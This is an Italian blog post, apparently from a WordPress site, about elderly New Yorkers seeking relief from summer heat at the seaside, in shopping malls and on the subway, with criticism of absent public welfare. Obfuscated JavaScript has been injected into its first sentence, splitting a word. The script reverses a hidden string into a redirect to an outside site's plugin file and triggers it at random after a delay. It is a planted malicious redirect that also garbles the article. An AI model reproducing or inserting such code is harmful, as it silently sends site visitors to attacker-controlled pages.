Vecchia America

image_pdfimage_print

In quella freddissima e innevata New York, qu (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando arriva l’estate, si fa sentire davvero! Alla fine di giugno il caldo e l’umidità costringono all’isolamento ed al condizionamento degli ambienti trasformando il mondo, ancora una volta, in un luogo chiuso ed asettico.
Mentre il riscaldamento invernale è distribuito dal comune, anche se in misura ridotta, la frescura dell’aria condizionata è un lusso che non tutti si possono permettere. Gli anziani in fuga dai 35° di temperatura e dal 95% di umidità, si trovano ad essere tra le categorie più svantaggiate nel cercare riparo dalla calura e conforto dalla solitudine.
Per coloro che non hanno risparmiato abbastanza denari per scappare in Florida, dove molti newyorkesi acquistano casa prima di andare in pensione, non resta che la città e quello che può offrire.
Seppure passi in secondo piano nell’immaginario collettivo, New York è una città di mare che si affaccia sull’Oceano Atlantico. È proprio sul mare che si può godere del sollievo naturale della brezza oceanica ed è qui che la maggior parte degli anziani confluisce, spesso grazie a forme assistenziali gestite da associazioni senza scopo di lucro, la maggior parte a carattere religioso. Battisti, Metodisti, Rinati in Cristo e altri delle molte confessioni e sette massicciamente presenti sul territorio nazionale sono spesso gli unici che si occupano di alleviare le pene dei più deboli.
Lo stato non esiste, non si occupa di certe faccende. Niente numeri verdi per le emergenze, nessuno spazio ricreativo o assistenziale gestito dalle amministrazioni pubbliche, il sociale è “nelle mani di Dio” (e di quelli che lo rappresentano). Il nostro ex Ministro della Salute Girolamo Sirchia, nel consigliare agli anziani italiani di passeggiare nei supermercati, deve aver trovato ispirazione da questa nazione, l’America. Un paese dove il sistema capitalista dovrebbe provvedere ad ogni esigenza, dove la mano invisibile del mercato dovrebbe soddisfare i bisogni di ogni classe sociale.
Per gli anziani americani i grandi magazzini e i centri commerciali sono infatti un riparo sicuro in cui poter frescheggiare passeggiando tra negozi d’ogni sorta e banchi frigo con alimenti esotici. Naturalmente la possibilità di sedersi è un lusso che non sempre si possono permettere, ma c’è un’alternativa più comoda, anche se meno stimolante: la metropolitana, dove alcuni si accomodano per ore e girando la città in su e giù godono del suo panorama osservandola dal sottosuolo.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *